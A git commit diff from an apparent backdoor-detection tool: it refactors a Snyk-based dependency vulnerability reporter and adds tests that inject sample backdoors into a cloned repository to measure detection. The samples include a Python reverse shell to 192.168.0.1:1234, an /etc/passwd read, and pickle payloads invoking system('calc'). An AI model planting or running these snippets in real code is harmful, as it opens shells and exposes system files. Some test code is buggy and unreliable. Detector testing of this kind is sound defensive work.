|  |                 for vuln in extracted_data: | ||||||
|  |                     if version_in_range(version, vuln["chip"]): | ||||||
|  |                         relevant_vulns.append(vuln) | ||||||
|  |                 if relevant_vulns: | ||||||
|  |                     result = f"Vulnerabilities found for {package_name}:\n" | ||||||
|  |                     for vuln in relevant_vulns: | ||||||
|  |                         result += f"  - {vuln['link']}\n" | ||||||
|  |                     results.append(result) | ||||||
|  |     return "\n".join(results) | ||||||
|  |  | ||||||
|     # 合并结果,先输出所有警告,然后输出所有正常情况 |  | ||||||
|     results = results_warning + results_ok | def save_to_file(output_path: str, data: str): | ||||||
|     # print(results) |     if output_path.endswith(".html"): | ||||||
|     if output_file: |         save_as_html(output_path, data) | ||||||
|         filename, ext = os.path.splitext(output_file) |     elif output_path.endswith(".pdf"): | ||||||
|         output_format = ext[1:] if ext[1:] else "txt" |         save_as_pdf(output_path, data) | ||||||
|         if output_format not in ["txt", "md", "html", "pdf"]: |     elif output_path.endswith(".md"): | ||||||
|             print("Warning: Invalid file format specified. Defaulting to TXT format.") |         save_as_markdown(output_path, data) | ||||||
|             output_format = "txt"  # 确保使用默认格式 |  | ||||||
|             output_file = filename + ".txt" |  | ||||||
|         output_results(output_file, results, output_format) |  | ||||||
|     else: |     else: | ||||||
|         print("\n".join(results)) |         save_as_txt(output_path, data) | ||||||
|  |  | ||||||
|  |  | ||||||
| def trans_vulnerable_packages_to_dict(content): | def save_as_html(output_path: str, data: str): | ||||||
|     """将漏洞信息转换为字典格式 |     escaped_data = html.escape(data) | ||||||
|     Args: |     html_content = f""" | ||||||
|         content str: 漏洞信息汇总. |     <html> | ||||||
|  |     <head> | ||||||
|  |         <meta charset="UTF-8"> | ||||||
|  |         <meta name="viewport" content="width=device-width, initial-scale=1.0"> | ||||||
|  |         <link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png"> | ||||||
|  |         <title>Vulnerability Report</title> | ||||||
|  |         <style> | ||||||
|  |             body {{ | ||||||
|  |                 font-family: Arial, sans-serif; | ||||||
|  |                 background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg'); | ||||||
|  |                 background-size: cover; | ||||||
|  |                 color: #333; | ||||||
|  |                 margin: 0; | ||||||
|  |                 padding: 0; | ||||||
|  |                 display: flex; | ||||||
|  |                 justify-content: center; | ||||||
|  |                 align-items: center; | ||||||
|  |                 height: 100vh; | ||||||
|  |             }} | ||||||
|  |             .container {{ | ||||||
|  |                 background: rgba(255, 255, 255, 0.8); | ||||||
|  |                 border-radius: 10px; | ||||||
|  |                 padding: 20px; | ||||||
|  |                 box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); | ||||||
|  |                 max-width: 800px; | ||||||
|  |                 width: 100%; | ||||||
|  |                 margin: 20px; | ||||||
|  |                 overflow-y: auto; | ||||||
|  |                 max-height: 90vh; | ||||||
|  |             }} | ||||||
|  |             .title {{ | ||||||
|  |                 font-size: 24px; | ||||||
|  |                 font-weight: bold; | ||||||
|  |                 text-align: center; | ||||||
|  |                 margin-bottom: 20px; | ||||||
|  |             }} | ||||||
|  |             pre {{ | ||||||
|  |                 white-space: pre-wrap; | ||||||
|  |                 word-wrap: break-word; | ||||||
|  |                 font-size: 14px; | ||||||
|  |                 line-height: 1.5; | ||||||
|  |                 color: #333; | ||||||
|  |                 background: #f4f4f4; | ||||||
|  |                 padding: 10px; | ||||||
|  |                 border-radius: 5px; | ||||||
|  |                 border: 1px solid #ddd; | ||||||
|  |                 overflow: auto; | ||||||
|  |                 font-weight: bold; | ||||||
|  |             }} | ||||||
|  |         </style> | ||||||
|  |     </head> | ||||||
|  |     <body> | ||||||
|  |         <div class="container"> | ||||||
|  |             <div class="title">Vulnerability Report</div> | ||||||
|  |             <pre>{escaped_data}</pre> | ||||||
|  |         </div> | ||||||
|  |     </body> | ||||||
|  |     </html> | ||||||
|     """ |     """ | ||||||
|     vulnerabilities = {} |     with open(output_path, "w", encoding="utf-8") as file: | ||||||
|     blocks = content.split("--------------------------------------------------") |         file.write(html_content) | ||||||
|     for block in blocks: |  | ||||||
|         name_match = re.search(r"Package Name: (.+)", block) |  | ||||||
|         range_match = re.search(r"Version Ranges: (.+)", block) |  | ||||||
|         if name_match and range_match: |  | ||||||
|             package_name = name_match.group(1).strip() |  | ||||||
|             version_range = range_match.group(1).strip() |  | ||||||
|             version_range = ",".join( |  | ||||||
|                 [part.strip() for part in version_range.split(",")] |  | ||||||
|             ) |  | ||||||
|             vulnerabilities[package_name] = SpecifierSet(version_range) |  | ||||||
|     return vulnerabilities |  | ||||||
|  |  | ||||||
|  |  | ||||||
| def output_pdf(results, file_name): | def save_as_pdf(output_path: str, data: str): | ||||||
|     doc = SimpleDocTemplate(file_name, pagesize=letter) |     doc = SimpleDocTemplate(output_path, pagesize=letter) | ||||||
|     story = [] |     story = [] | ||||||
|     styles = getSampleStyleSheet() |     styles = getSampleStyleSheet() | ||||||
|  |  | ||||||
|     # Custom styles |     # Add the title centered | ||||||
|     title_style = styles["Title"] |     title_style = ParagraphStyle( | ||||||
|     title_style.alignment = 1  # Center alignment |         "Title", | ||||||
|  |         parent=styles["Title"], | ||||||
|     warning_style = ParagraphStyle( |         alignment=1,  # Center alignment | ||||||
|         "WarningStyle", parent=styles["BodyText"], fontName="Helvetica-Bold" |         fontSize=24, | ||||||
|  |         leading=28, | ||||||
|  |         spaceAfter=20, | ||||||
|  |         fontName="Helvetica-Bold", | ||||||
|     ) |     ) | ||||||
|     normal_style = styles["BodyText"] |  | ||||||
|  |  | ||||||
|     # Add the title |  | ||||||
|     title = Paragraph("Vulnerability Report", title_style) |     title = Paragraph("Vulnerability Report", title_style) | ||||||
|     story.append(title) |     story.append(title) | ||||||
|     story.append(Spacer(1, 20))  # Space after title |  | ||||||
|  |  | ||||||
|     # Iterate through results to add entries |     # Normal body text style | ||||||
|     for result in results: |     normal_style = ParagraphStyle( | ||||||
|         if "WARNING:" in result: |         "BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12 | ||||||
|             # Add warning text in bold |  | ||||||
|             entry = Paragraph( |  | ||||||
|                 result.replace("WARNING:", "<b>WARNING:</b>"), warning_style |  | ||||||
|     ) |     ) | ||||||
|         else: |  | ||||||
|             # Add normal text |  | ||||||
|             entry = Paragraph(result, normal_style) |  | ||||||
|  |  | ||||||
|         story.append(entry) |     # Add the vulnerability details | ||||||
|         story.append(Spacer(1, 12))  # Space between entries |     for line in data.split("\n"): | ||||||
|  |         if line.strip():  # Skip empty lines | ||||||
|  |             story.append(Paragraph(line, normal_style)) | ||||||
|  |  | ||||||
|     doc.build(story) |     doc.build(story) | ||||||
|  |  | ||||||
|  |  | ||||||
| def output_results(filename, results, format_type): | def save_as_markdown(output_path: str, data: str): | ||||||
|     """根据指定的格式输出结果""" |     with open(output_path, "w") as file: | ||||||
|     output_dir = os.path.dirname(filename) |         file.write("## Vulnerability Report: \n\n") | ||||||
|     if not os.path.exists(output_dir): |         file.write(data) | ||||||
|         os.makedirs(output_dir) |  | ||||||
|  |  | ||||||
|     with open(filename, "w", encoding="utf-8") as file: |  | ||||||
|         if format_type == "html": |  | ||||||
|             file.write("<html><head><title>Vulnerability Report</title></head><body>\n") |  | ||||||
|             file.write("<h1>Vulnerability Report</h1>\n") |  | ||||||
|             for result in results: |  | ||||||
|                 file.write(f"<p>{result}</p>\n") |  | ||||||
|             file.write("</body></html>") |  | ||||||
|         elif format_type == "md": |  | ||||||
|             file.write("# Vulnerability Report\n") |  | ||||||
|             for result in results: |  | ||||||
|                 file.write(f"* {result}\n") |  | ||||||
|         elif format_type == "pdf": |  | ||||||
|             output_pdf(results, filename) |  | ||||||
|         else:  # 默认为txt |  | ||||||
|             for result in results: |  | ||||||
|                 file.write(f"{result}\n") |  | ||||||
|  |  | ||||||
|     print("Results have been saved as " + filename) |  | ||||||
|  |  | ||||||
|  |  | ||||||
| def main(): | def save_as_txt(output_path: str, data: str): | ||||||
|     parser = argparse.ArgumentParser( |     with open(output_path, "w") as file: | ||||||
|         description="Check project dependencies for vulnerabilities." |         file.write("Vulnerability Report: \n\n") | ||||||
|     ) |         file.write(data) | ||||||
|     parser.add_argument( |  | ||||||
|         "requirements_file", help="Path to the requirements file of the project" |  | ||||||
|     ) |  | ||||||
|     parser.add_argument( |  | ||||||
|         "-o", |  | ||||||
|         "--output", |  | ||||||
|         help="Output file path with extension, e.g., './output/report.txt'", |  | ||||||
|     ) |  | ||||||
|     args = parser.parse_args() |  | ||||||
|  |  | ||||||
|     base_url = "https://security.snyk.io/vuln/pip/" |  | ||||||
|     page_number = 1 |  | ||||||
|     crawler_results = "" |  | ||||||
|     while True: |  | ||||||
|         url = f"{base_url}{page_number}" |  | ||||||
|         print(f"Fetching data from {url}") |  | ||||||
|         html_content = fetch_html(url) |  | ||||||
|         if not html_content: |  | ||||||
|             print("No more data found or failed to fetch.") |  | ||||||
|             break |  | ||||||
|         extracted_data = parse_html(html_content) |  | ||||||
|         if not extracted_data: |  | ||||||
|             print("No relevant data found on page.") |  | ||||||
|             break |  | ||||||
|         crawler_results += format_results(extracted_data) |  | ||||||
|         page_number += 1 |  | ||||||
|     print("Results have been stored in memory.\n") |  | ||||||
|  |  | ||||||
|     trans_res = trans_vulnerable_packages(crawler_results) |  | ||||||
|     trans_res = format_vulnerabilities(trans_res) |  | ||||||
|     trans_res = trans_vulnerable_packages_to_dict(trans_res) |  | ||||||
|     requirements = load_requirements(args.requirements_file) |  | ||||||
|     check_vulnerabilities(requirements, trans_res, args.output) |  | ||||||
|  |  | ||||||
|  |  | ||||||
| if __name__ == "__main__": | def print_separator(title, char="-", length=50, padding=2): | ||||||
|     main() |     print(f"{title:^{length + 4*padding}}")  # 居中打印标题,两侧各有padding个空格 | ||||||
|  |     print(char * (length + 2 * padding))  # 打印分割线,两侧各有padding个字符的空格 | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def modify_file_name(file_path: str) -> str: | ||||||
|  |     """ | ||||||
|  |     Modify the file name by adding '-re' before the file extension. | ||||||
|  |  | ||||||
|  |     Args: | ||||||
|  |         file_path (str): The original file path. | ||||||
|  |  | ||||||
|  |     Returns: | ||||||
|  |         str: The modified file path. | ||||||
|  |     """ | ||||||
|  |     directory, file_name = os.path.split(file_path) | ||||||
|  |     name, ext = os.path.splitext(file_name) | ||||||
|  |     new_file_name = f"{name}-re{ext}" | ||||||
|  |     new_file_path = os.path.join(directory, new_file_name) | ||||||
|  |     return new_file_path | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def requirement_detection(requirement_path, output_path=None): | ||||||
|  |     base_url = "https://security.snyk.io/package/pip/" | ||||||
|  |     requirements = load_requirements(requirement_path) | ||||||
|  |     results = check_vulnerabilities(requirements, base_url) | ||||||
|  |     if output_path is not None: | ||||||
|  |         new_path = modify_file_name(output_path) | ||||||
|  |         save_to_file(new_path, results) | ||||||
|  |         print(f"Vulnerability scan complete. Results saved to {output_path}") | ||||||
|  |         print(f"Requirements scan complete. Results saved to {new_path}") | ||||||
|  |     else: | ||||||
|  |         print_separator("\nVulnerability Report", "=", 40, 5) | ||||||
|  |         print(results) | ||||||
|   | |||||||
| @@ -3,6 +3,5 @@ requests | |||||||
| packaging | packaging | ||||||
| openai | openai | ||||||
| bs4 | bs4 | ||||||
| uncompyle6 |  | ||||||
| colorama | colorama | ||||||
| tqdm | tqdm | ||||||
							
								
								
									
										1
									
								
								setup.py
									
									
									
									
									
								
							
							
						
						
									
										1
									
								
								setup.py
									
									
									
									
									
								
							| @@ -38,7 +38,6 @@ setup( | |||||||
|         "packaging", |         "packaging", | ||||||
|         "openai", |         "openai", | ||||||
|         "bs4", |         "bs4", | ||||||
|         "uncompyle6", |  | ||||||
|         "tqdm", |         "tqdm", | ||||||
|         "colorama", |         "colorama", | ||||||
|     ], |     ], | ||||||
|   | |||||||
							
								
								
									
										159
									
								
								tests/final_tests_util.py
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										159
									
								
								tests/final_tests_util.py
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,159 @@ | |||||||
|  | from typing import Tuple, List | ||||||
|  | from git import Repo  # type: ignore | ||||||
|  | import random | ||||||
|  | from pathlib import Path | ||||||
|  | import pickle | ||||||
|  | import os | ||||||
|  | import py_compile | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def clone_repo(repo_url: str, clone_dir: str) -> None: | ||||||
|  |     """ | ||||||
|  |     Clone a Git repository to the specified directory. | ||||||
|  |  | ||||||
|  |     Args: | ||||||
|  |         repo_url (str): The URL of the Git repository to clone. | ||||||
|  |         clone_dir (str): The directory where the repository should be cloned. | ||||||
|  |     """ | ||||||
|  |     try: | ||||||
|  |         Repo.clone_from(repo_url, clone_dir, depth=1) | ||||||
|  |     except Exception as e: | ||||||
|  |         print(f"Error cloning repository: {e}") | ||||||
|  |  | ||||||
|  |  | ||||||
|  | # a return type of backdoor. Include injected file name and number. | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def inject_random_backdoor( | ||||||
|  |     path: str, sample_rate: float = 0.1 | ||||||
|  | ) -> Tuple[Tuple[str, int], ...]: | ||||||
|  |     """ | ||||||
|  |     Insert random backdoor into the path. | ||||||
|  |  | ||||||
|  |     Args: | ||||||
|  |         path (str): The path to the repository to insert the backdoor into. | ||||||
|  |         pickle (bool): Whether to insert a backdoor into a pickle file. | ||||||
|  |         pyc (bool): Whether to insert a backdoor into a compiled Python file. | ||||||
|  |     """ | ||||||
|  |     project_path = Path(path) | ||||||
|  |     all_python_files = list(project_path.rglob("*.py")) | ||||||
|  |     injected_python_files = [] | ||||||
|  |  | ||||||
|  |     for python_file in all_python_files: | ||||||
|  |         # sample files to inject backdoor | ||||||
|  |         if random.random() < sample_rate: | ||||||
|  |             injected_python_files.append(python_file) | ||||||
|  |     injectedNum = len(injected_python_files) | ||||||
|  |  | ||||||
|  |     results: List[Tuple[str, int]] = [] | ||||||
|  |     # inject backdoor | ||||||
|  |     for python_file in injected_python_files: | ||||||
|  |         with open(python_file, "r+", errors="ignore") as f: | ||||||
|  |             lines = f.readlines() | ||||||
|  |             total_lines = len(lines) | ||||||
|  |             inject_line_number = random.randint(0, total_lines) | ||||||
|  |             # choose random backdoor | ||||||
|  |             inject_code = random.choice(backdoors) | ||||||
|  |             lines.insert(inject_line_number, inject_code + "\n") | ||||||
|  |             f.seek(0) | ||||||
|  |             f.writelines(lines) | ||||||
|  |             results.append((str(python_file), inject_line_number)) | ||||||
|  |  | ||||||
|  |     return tuple(results) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | # 示例1: 通过 os.system 执行命令 | ||||||
|  | backdoor1 = """import os | ||||||
|  | os.system('ls')""" | ||||||
|  |  | ||||||
|  | # 示例2: 通过 subprocess 模块执行命令 | ||||||
|  | backdoor2 = """import subprocess | ||||||
|  | subprocess.call(['ls', '-l'])""" | ||||||
|  |  | ||||||
|  | # 示例3: 打开一个反向 shell | ||||||
|  | backdoor3 = """import socket,subprocess,os | ||||||
|  | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) | ||||||
|  | s.connect(("192.168.0.1",1234)) | ||||||
|  | os.dup2(s.fileno(),0) | ||||||
|  | os.dup2(s.fileno(),1) | ||||||
|  | os.dup2(s.fileno(),2) | ||||||
|  | subprocess.call(["/bin/sh","-i"])""" | ||||||
|  |  | ||||||
|  | # 示例4: 通过 eval 执行任意代码 | ||||||
|  | backdoor4 = """code = "print('Hello, World!')" | ||||||
|  | eval(code)""" | ||||||
|  |  | ||||||
|  | # 示例5: 通过 exec 执行任意代码 | ||||||
|  | backdoor5 = """code = ''' | ||||||
|  | import os | ||||||
|  | os.system('ls') | ||||||
|  | ''' | ||||||
|  | exec(code)""" | ||||||
|  |  | ||||||
|  |  | ||||||
|  | # 示例7: 读取并显示文件内容 | ||||||
|  | backdoor7 = """with open('/etc/passwd', 'r') as file: | ||||||
|  |     data = file.read() | ||||||
|  |     print(data)""" | ||||||
|  |  | ||||||
|  |  | ||||||
|  | backdoors = [ | ||||||
|  |     backdoor1, | ||||||
|  |     backdoor2, | ||||||
|  |     backdoor3, | ||||||
|  |     backdoor4, | ||||||
|  |     backdoor5, | ||||||
|  |     backdoor7, | ||||||
|  | ] | ||||||
|  |  | ||||||
|  | backdoors_pickle = [ | ||||||
|  |     b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.', | ||||||
|  |     b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.', | ||||||
|  |     b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.', | ||||||
|  |     b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.' | ||||||
|  | ] | ||||||
|  | def inject_pickle_backdoor(root_path: str) -> None: | ||||||
|  |     """ | ||||||
|  |     Generate a pickle backdoor and insert it into the specified path. | ||||||
|  |  | ||||||
|  |     Args: | ||||||
|  |         path (str): The path to the repository to insert the backdoor into. | ||||||
|  |     """ | ||||||
|  |     all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()] | ||||||
|  |     paths = random.sample(all_path, random.randrange(1, len(all_path))) | ||||||
|  |     for path in paths: | ||||||
|  |         backdoor_id = random.randrange(0, len(backdoors_pickle)) | ||||||
|  |         backdoor = backdoors_pickle[backdoor_id] | ||||||
|  |         filename = os.path.join(path, f"backdoor{backdoor_id}.pickle") | ||||||
|  |         with open(filename, "wb") as f: | ||||||
|  |             pickle.dump(backdoor, f) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def inject_pyc_backdoor(root_path: str) -> None: | ||||||
|  |     """ | ||||||
|  |     Generate a pyc backdoor and insert it into the specified path. | ||||||
|  |  | ||||||
|  |     Args: | ||||||
|  |         path (str): The path to the repository to insert the backdoor into. | ||||||
|  |     """ | ||||||
|  |     all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()] | ||||||
|  |     paths = random.sample(all_path, random.randrange(1, len(all_path))) | ||||||
|  |  | ||||||
|  |     for path in paths: | ||||||
|  |         backdoor_id = random.randrange(0, len(backdoors)) | ||||||
|  |         backdoor = backdoors[backdoor_id] | ||||||
|  |         py_filename = os.path.join(path, f"backdoor{backdoor_id}.py") | ||||||
|  |         pyc_filename = os.path.join(path, f"backdoor{backdoor_id}.pyc") | ||||||
|  |         with open(py_filename, "w") as f: | ||||||
|  |             f.write(backdoor) | ||||||
|  |  | ||||||
|  |         py_compile.compile(py_filename, cfile=pyc_filename) | ||||||
|  |         os.remove(py_filename) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | if __name__ == "__main__": | ||||||
|  |     repo_url = "https://github.com/TheAlgorithms/Python.git" | ||||||
|  |     clone_dir = "/tmp/repo" | ||||||
|  |     clone_repo(repo_url, clone_dir) | ||||||
|  |     inject_random_backdoor(clone_dir) | ||||||
|  |     inject_pickle_backdoor(clone_dir) | ||||||
							
								
								
									
										168
									
								
								tests/test_final_tests.py
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										168
									
								
								tests/test_final_tests.py
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,168 @@ | |||||||
|  | import time | ||||||
|  | import unittest | ||||||
|  | import shutil | ||||||
|  | import os | ||||||
|  | import threading | ||||||
|  | import re | ||||||
|  |  | ||||||
|  | from detection.utils import read_file_content | ||||||
|  | from .final_tests_util import ( | ||||||
|  |     clone_repo, | ||||||
|  |     Path, | ||||||
|  |     inject_pickle_backdoor, | ||||||
|  |     inject_random_backdoor, | ||||||
|  |     inject_pyc_backdoor, | ||||||
|  |     backdoors, | ||||||
|  | ) | ||||||
|  | from detection.Regexdetection import find_dangerous_functions | ||||||
|  | from detection.GPTdetection import detectGPT | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTdetectFileList(fileList): | ||||||
|  |     results = [] | ||||||
|  |     threads = [] | ||||||
|  |     for file in fileList: | ||||||
|  |         content = read_file_content(str(file)) | ||||||
|  |         threads.append(threading.Thread(target=GPTThread(), args=(content, results))) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.start() | ||||||
|  |         time.sleep(0.5) | ||||||
|  |     for thread in threads: | ||||||
|  |         thread.join() | ||||||
|  |     return results | ||||||
|  |  | ||||||
|  |  | ||||||
|  | def GPTThread(content, results): | ||||||
|  |     try: | ||||||
|  |         results.append(detectGPT(content)) | ||||||
|  |     except Exception as e: | ||||||
|  |         print(e) | ||||||
|  |  | ||||||
|  |  | ||||||
|  | class TestFinalTests(unittest.TestCase): | ||||||
|  |     def setUp(self) -> None: | ||||||
|  |         self.path = "./tmp/repo/" | ||||||
|  |         shutil.rmtree(self.path, ignore_errors=True) | ||||||
|  |         if not os.path.exists("/tmp/Python/"): | ||||||
|  |             clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python") | ||||||
|  |         shutil.copytree("/tmp/Python", self.path) | ||||||
|  |         sampleRate = 0.1 | ||||||
|  |  | ||||||
|  |         # TODO | ||||||
|  |         # preproccessing | ||||||
|  |  | ||||||
|  |         self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate) | ||||||
|  |         self.pickle_true_num = inject_pickle_backdoor(self.path) | ||||||
|  |         self.pyc_true_num = inject_pyc_backdoor(self.path) | ||||||
|  |         self.injectedNum = len(self.inject_result) | ||||||
|  |         print(self.injectedNum) | ||||||
|  |         project_path = Path(self.path) | ||||||
|  |  | ||||||
|  |         self.all_python_files = list(project_path.rglob("*.py")) | ||||||
|  |         self.py_files_num = len(self.all_python_files) | ||||||
|  |  | ||||||
|  |         all_pickle_files = list(project_path.rglob("*.pickle")) | ||||||
|  |         self.pickle_files_num = len(all_pickle_files) | ||||||
|  |  | ||||||
|  |         all_pyc_files = list(project_path.rglob("*.pyc")) | ||||||
|  |         self.pyc_files_num = len(all_pyc_files) | ||||||
|  |  | ||||||
|  |         os.system( | ||||||
|  |             "python -m detection " + self.path + " -o " + self.path + "output.txt" | ||||||
|  |         ) | ||||||
|  |  | ||||||
|  |     def test_final_tests_pycode(self): | ||||||
|  |         # test backdoor code in python files | ||||||
|  |         detectedNum = 0 | ||||||
|  |         possibly_dangerous_file = [] | ||||||
|  |         for file in self.all_python_files: | ||||||
|  |             content = read_file_content(str(file)) | ||||||
|  |             results = find_dangerous_functions(content, ".py") | ||||||
|  |             if ( | ||||||
|  |                 len(results["high"]) > 0 | ||||||
|  |                 or len(results["medium"]) > 0 | ||||||
|  |                 or len(results["low"]) > 0 | ||||||
|  |             ): | ||||||
|  |                 detectedNum += 1 | ||||||
|  |                 possibly_dangerous_file.append(file) | ||||||
|  |         print(detectedNum / self.py_files_num) | ||||||
|  |         GPTdetectedNum = 0 | ||||||
|  |  | ||||||
|  |         for i in possibly_dangerous_file: | ||||||
|  |             content = read_file_content(str(i)) | ||||||
|  |             results = {} | ||||||
|  |             try: | ||||||
|  |                 results = detectGPT(content) | ||||||
|  |                 if ( | ||||||
|  |                     len(results["high"]) > 0 | ||||||
|  |                     or len(results["medium"]) > 0 | ||||||
|  |                     or len(results["low"]) > 0 | ||||||
|  |                 ): | ||||||
|  |                     GPTdetectedNum += 1 | ||||||
|  |                 print(GPTdetectedNum) | ||||||
|  |  | ||||||
|  |             except Exception as e: | ||||||
|  |                 # print(e) | ||||||
|  |                 pass | ||||||
|  |  | ||||||
|  |         # test injected code | ||||||
|  |         with open(self.path + "output.txt", "r") as f: | ||||||
|  |             lines = f.readlines() | ||||||
|  |             injected_detected_num = 0 | ||||||
|  |             injected_correct_num = 0 | ||||||
|  |             pattern = r"\w+\.py: Line \d+: (.+)" | ||||||
|  |             for line in lines: | ||||||
|  |                 if "py:" in line: | ||||||
|  |                     injected_detected_num += 1 | ||||||
|  |                 match = re.search(pattern, line) | ||||||
|  |                 command = "" | ||||||
|  |                 if match: | ||||||
|  |                     command = match.group(1) | ||||||
|  |                 for backdoor in backdoors: | ||||||
|  |                     if command in backdoor: | ||||||
|  |                         injected_correct_num += 1 | ||||||
|  |                         break | ||||||
|  |  | ||||||
|  |         injected_accurency = injected_detected_num / self.py_files_num | ||||||
|  |         print(f"injected files accurency: {injected_accurency}") | ||||||
|  |         try: | ||||||
|  |             GPTresult = GPTdetectFileList(possibly_dangerous_file) | ||||||
|  |             for result in GPTresult: | ||||||
|  |                 if len(result) > 0: | ||||||
|  |                     GPTdetectedNum += 1 | ||||||
|  |             print(GPTdetectedNum) | ||||||
|  |             self.assertGreaterEqual(GPTdetectedNum, detectedNum) | ||||||
|  |         except Exception as e: | ||||||
|  |             # print(e) | ||||||
|  |             pass | ||||||
|  |  | ||||||
|  |         # test pickle files | ||||||
|  |         with open(self.path + "output.txt", "r") as f: | ||||||
|  |             lines = f.readlines() | ||||||
|  |             pickle_detected_num = 0 | ||||||
|  |             pickle_correct_num = 0 | ||||||
|  |             for line in lines: | ||||||
|  |                 if "pickle" in line: | ||||||
|  |                     pickle_detected_num += 1 | ||||||
|  |                 if re.search(r"backdoor\d*\.pickle", line): | ||||||
|  |                     pickle_correct_num += 1 | ||||||
|  |  | ||||||
|  |         pickle_accurency = pickle_detected_num / self.pickle_true_num | ||||||
|  |         print(f"pickle files accurency: {pickle_accurency}") | ||||||
|  |  | ||||||
|  |         # test pyc files | ||||||
|  |         with open(self.path + "output.txt", "r") as f: | ||||||
|  |             lines = f.readlines() | ||||||
|  |             pyc_detected_num = 0 | ||||||
|  |             pyc_correct_num = 0 | ||||||
|  |             for line in lines: | ||||||
|  |                 if "pyc" in line: | ||||||
|  |                     pyc_detected_num += 1 | ||||||
|  |                 if re.search(r"backdoor\d*\.pyc", line): | ||||||
|  |                     pyc_correct_num += 1 | ||||||
|  |         pyc_accurency = pyc_detected_num / self.pyc_true_num | ||||||
|  |         print(f"pyc files accurency: {pyc_accurency}") | ||||||
|  |  | ||||||
|  |  | ||||||
|  | if __name__ == "__main__": | ||||||
|  |     unittest.main() | ||||||
		Reference in New Issue
	
	Block a user